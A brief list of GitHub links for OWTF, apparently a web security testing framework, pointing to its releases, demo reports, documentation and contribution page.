• Try OWTF: https://github.com/7a/owtf_releases
• Try a demo report: https://github.com/7a/owtf_demos
• Documentation: https://github.com/7a/owtf/wiki
• Contribute/Download: https://github.com/7a/owtf